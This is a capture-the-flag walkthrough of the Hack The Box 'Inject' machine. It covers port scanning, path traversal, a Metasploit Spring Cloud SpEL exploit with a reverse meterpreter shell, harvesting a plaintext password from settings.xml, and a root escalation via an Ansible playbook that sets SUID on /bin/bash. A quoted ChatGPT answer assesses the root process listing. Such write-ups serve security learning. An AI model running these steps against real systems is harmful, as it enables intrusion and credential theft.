HTB Inject Walkthrough with ChatGPT

Introduction

It’s been a long time since I played the HTB machine playground. As a formal exercise for the comeback, it’s a little difficult, but fortunately after going through a lot of detours, I really work out it!

Some technique hacking tricks you maybe need:

• basic hacking trick like port scan and so on
• spring cloud vulnerability， which can be referred from https://www.rapid7.com/db/modules/exploit/multi/http/spring_cloud_function_spel_injection/ (maybe I will write a blog focus on this vulnerability but not now 🤣

Ok, let’s go!

Information & Enumeration

Generally, use nmap to enumerate ports, results like as follows

# Nmap 7.70 scan initiated Fri Jun  9 14:45:31 2023 as: nmap -p- --min-rate 10000 -oA result 10.10.11.204
Warning: 10.10.11.204 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.204
Host is up (0.22s latency).
Not shown: 63577 closed ports, 1956 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

# Nmap done at Fri Jun  9 14:46:26 2023 -- 1 IP address (1 host up) scanned in 54.73 seconds

Obviously， the 8080 port is our target, So try to enumerate more，after use some directory scan tools, we have found a route which can upload some pictures

After upload a picture, and you can redirect /show_image?img=xxxx.png to view your picture

There are some thoughts

1. arbitrary file upload , unfortunately, nope 😇
2. arbitrary file read , ok it can!

(Another thing I want to mentioned is that this website application developed by Java, So there are so many directories. If you just input like /show_image?img=../../../etc/passwd, you will be frustrated 🥲)

shell as user

After review the pom.xml that we just leak, and search sprint in msfconsole

There already had some hints on reddit

https://www.reddit.com/r/hackthebox/comments/128uxbw/htb_inject_machine_help/

Soon, you will find this website is based on spring and deployed on cloud

This exploit multi/http/spring_cloud_function_spel_injection maybe works

Just use it and set some parameter with your environment

msf6 exploit(multi/http/spring_cloud_function_spel_injection) > options 

Module options (exploit/multi/http/spring_cloud_function_spel_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.11.204     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /functionRouter  yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.
                                       0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.65      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

Finally, exploit success and got a meterpreter 😏

shell as user

As we all know, settings.xml exists, which in ~/.m2 directory, and there are some important information

Lucky, we found

ls -al /home/frank/.m2
total 12
drwx------ 2 frank frank 4096 Feb  1 18:38 .
drwxr-xr-x 8 frank frank 4096 Jun 10 13:09 ..
-rw-r----- 1 root  frank  617 Jan 31 16:55 settings.xml

And surprise !

cat /home/frank/.m2/settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

So we get Phil’s password.

shell as root

After long time search , try to use linux-enum.sh , which can be downloaded from https://github.com/rebootuser/LinEnum

I have found this:

root       88559  0.0  0.0   2608   600 ?        Ss   Jun09   0:00 /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml
root       88561  0.0  0.4 172088 16960 ?        Sl   Jun09   0:00 /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/evil.yml /opt/automation/tasks/playbook_1.yml
root       88564  5.3  1.3 137764 54156 ?        Sl   Jun09  48:18 /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/evil.yml
root       88712  0.0  1.2 140892 49780 ?        S    Jun09   0:00 /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/evil.yml

I just submit to chatGPT, and it really works!!!, answer as follows:

The output you've shared is from the ps command, which provides information about the currently running processes. This output tells us that there is an Ansible automation process running as root user. Ansible is a popular automation tool used to automate a wide range of IT tasks such as configuration management, application deployment, and intra-service orchestration.

This process is executing ansible playbooks found under /opt/automation/tasks/ .

Among the tasks, there is an intriguing one named evil.yml. This is a potential red flag, since the name suggests that it might be related to a malicious task or activity. However, the name alone doesn't confirm that, it's just an indication and further investigation is required.

A common way to exploit this would be if the evil.yml playbook contains tasks that are insecure or if an attacker can write to the /opt/automation/tasks/ directory. In that case, they can modify or create a new playbook with tasks that could help to escalate privileges, then wait for the automation process to execute that playbook.

To further investigate, you could:

1. Check the contents of the evil.yml playbook.
2. Check the permissions of the /opt/automation/tasks/ directory.
3. Look for any tasks in the playbook that may be exploited to escalate privileges or perform unauthorized actions.
4. Check who has write permissions to the ansible playbook files.

So we can exploit like as follows:

- hosts: localhost
  tasks:
  - name: Exploit task
    command: chmod u+s /bin/bash
    become: true

It turns out that we success change bash binary

bash-5.0$ ls -al /bin/bash
ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash

exactly, input bash -p then, we can login as root !

cat /root/root.txt

*************************